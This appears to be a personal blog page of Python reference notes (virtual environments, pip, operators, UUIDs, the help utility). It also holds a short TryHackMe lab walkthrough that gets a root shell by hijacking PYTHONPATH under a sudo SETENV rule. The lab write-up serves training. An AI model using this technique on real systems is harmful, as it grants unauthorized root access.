Skip to main content

Python: Notes

Python Logo

>>> Python Standard Library

python -m venv name_env : Create virtual environment 'name_env'
python -m pip install --upgrade pip : Upgrade pip (a package manager for Python)

python -m http.server 8080 -d /var/www/test : run an adhoc web server at localhost:8080

pip is a package manager for Python, which is installed by default since Python version 3.4.

pip install package_name : Install package_name
pip uninstall package_name : Uninstall package_name
pip install -r requirements.txt : install packages listed in requirements.txt file
pip list : list all installed packages

78 / 10 # 7.8 : division
78 // 10 # 7 : integer division
78 % 10 : modulo

Generate GUID

PS C:\Users\Tuyen> python -c "import uuid ; print(uuid.uuid4())"
01fcc0fc-a620-4f13-9174-c26e3e292780
PS C:\Users\Tuyen>

Get Help

PS C:\Users\Tuyen> python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> help
Type help() for interactive help, or help(object) for help about object.
>>> help()

Welcome to Python 3.6's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/3.6/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help>

Install python-jwt module for python2 on Kali Linuz WSL

pip install -t /usr/local/lib/python2.7/dist-packages/ python-jwt

Exploit python

oliver@unbaked:~$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~$ cat /opt/dockerScript.py
import docker

# oliver, make sure to restart docker if it crashes or anything happened.
# i havent setup swap memory for it
# it is still in development, please dont let it live yet!!!
client = docker.from_env()
client.containers.run("python-django:latest", "sleep infinity", detach=True)
oliver@unbaked:~$ touch /tmp/docker.py
oliver@unbaked:~$ nano /tmp/docker.py
oliver@unbaked:~$ chmod +x /tmp/docker.py
oliver@unbaked:~$ cat /tmp/docker.py
import os
os.system("/bin/bash")
oliver@unbaked:~$
oliver@unbaked:~$ sudo PYTHONPATH=/tmp /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~# id
uid=0(root) gid=0(root) groups=0(root)
oliver@unbaked:~# cat /root/root.txt
CONGRATS ON PWNING THIS BOX!
Created by ch4rm & H0j3n
ps: dont be mad us, we hope you learn something new

flag: THM{REDACTED}
oliver@unbaked:~#

Practice

>>> THM | Unbaked Pie

>>> The Zen of Python by Tim Peters

Labels:

Popular posts from this blog

Microsoft Windows Server 2012 R2 Standard Evaluation Product Key

Microsoft Windows Server 2012 R2 Standard Evaluation D2N9P-3P6X9-2R39C-7RTCD-MDVJX DBGBW-NPF86-BJVTX-K3WKJ-MTB6V
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more

hmailserver: Notes from the field

hmailserver is one of free open source mail servers running on Microsoft Windows operating system.
Read more